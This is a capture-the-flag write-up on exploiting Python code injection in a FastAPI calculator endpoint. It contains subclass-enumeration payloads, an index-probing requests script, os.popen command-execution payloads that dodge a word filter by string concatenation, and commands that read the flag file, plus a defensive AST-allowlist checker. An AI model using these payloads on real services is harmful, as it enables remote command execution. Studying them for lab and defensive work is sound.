# fastapi

* Fast: very high performance, on par with NodeJS and Go
* Fast to code: increases feature development speed by about 200% to 300%
* Fewer bugs: reduces human-induced errors by about 40%
* Intuitive: great editor support, completion everywhere, less time debugging
* Easy: designed to be easy to use and learn, less time reading docs.
* Short: minimizes code duplication.
* Robust: get production-ready code with automatic interactive documentation
* Standards-based: based on and fully compatible with the open standards for APIs, OpenAPI and JSON Schema

There is a `/docs` documentation page, and `/ccca1ccc` accepts input you can interact with.

Since the service is Python, the first idea was SSTI (template injection), but every payload found online only returned an empty string or an error.

Wrapping the expression in `str()` and slicing it does get displayed, so this works:

```
str([].__class__.__base__.__subclasses__())[1:]
```

It returns every subclass of `object`.

![](/files/xbgHRubkXmCCnDUdjQ6M)

Find the index of `warnings.catch_warnings` and return it (reference: [Lazzaro](https://lazzzaro.github.io/2020/10/25/match-CTFshow-1024%E6%9D%AF/)):

```python
import requests

# Probe each index of the subclass list and report which one is
# warnings.catch_warnings (the output is echoed back by the service).
url = 'http://0036be1d-d998-420a-bdef-421987f9eb43.chall.ctf.show/cccalccc'
for i in range(500):
    data = {'q': 'str([].__class__.__base__.__subclasses__()[' + str(i) + '])[1:]'}
    r = requests.post(url, data=data)
    if r.text.find("warnings.catch_warnings") != -1:
        print(i)
        print(r.text)
```

![](/files/PEYv9Ps4ruGHopAG0HQC)

Payload:

```
[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__import__']('os').system('ls')
```

There is a filter: after fuzzing, `system` and `import` turn out to be blocked. `import` can be bypassed by string concatenation, and `system` can be replaced with `popen`:

```
str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['po'+'pen']('ls').read())[1:]
```
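From the defensive side, the filter above fails because it inspects the raw text rather than the parsed expression, so `'__imp'+'ort__'` never contains the banned word. The checker below is an added example, not part of the original writeup or the challenge code; it assumes the service is meant to be a calculator, parses input with `ast` and accepts only numeric constants and arithmetic operators, using the page's own expressions as constructed test inputs.

```python
import ast
import operator
# Constructed sample inputs: a benign calculator query, the subclass-enumeration
# expression from the writeup, and the string-concatenation bypass it used.
SAMPLES = {
    "benign": "(1 + 2) * 3 ** 2",
    "subclasses": "str([].__class__.__base__.__subclasses__())[1:]",
    "concat_bypass": "[].__class__.__base__.__subclasses__()[189].__init__"
                     ".__globals__['__builtins__']['__imp'+'ort__']('os')",
}

def substring_denylist(q: str) -> bool:
    """The kind of filter the writeup fuzzed: accepts unless a banned word appears."""
    return not any(word in q for word in ("system", "import"))

# Allowlisted arithmetic only; Name, Attribute, Subscript and Call are never accepted.
_BIN = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
        ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod, ast.Pow: operator.pow}
_UN = {ast.UAdd: operator.pos, ast.USub: operator.neg}

def allowlist_accepts(q: str) -> bool:
    """Parse without evaluating; accept only numeric constants and known operators."""
    try:
        tree = ast.parse(q, mode="eval")
    except (SyntaxError, ValueError):
        return False
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant):
            if isinstance(node.value, bool) or not isinstance(node.value, (int, float)):
                return False  # string pieces such as '__imp' never get through
        elif not isinstance(node, (ast.Expression, ast.BinOp, ast.UnaryOp, *_BIN, *_UN)):
            return False  # Attribute, Subscript, Call, Name, List, ...
    return True

def safe_calc(q: str):
    """Evaluate an accepted expression by walking its AST; eval() is never called."""
    if not allowlist_accepts(q):
        raise ValueError("expression rejected")
    def ev(n):
        if isinstance(n, ast.Constant):
            return n.value
        if isinstance(n, ast.UnaryOp):
            return _UN[type(n.op)](ev(n.operand))
        left, right = ev(n.left), ev(n.right)
        if isinstance(n.op, ast.Pow) and abs(right) > 64:
            raise ValueError("exponent too large")  # cheap resource-exhaustion guard
        return _BIN[type(n.op)](left, right)
    return ev(ast.parse(q, mode="eval").body)
```

Running both checks over `SAMPLES` shows the denylist accepting the concatenation payload while the AST allowlist rejects it and still evaluates the benign query.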

Nothing useful there, so use grep to search for the keyword:

```
[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('find /app | xargs grep flag').read()
```

Read the flag:

```
[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('cat /mnt/f1a9').read()
```
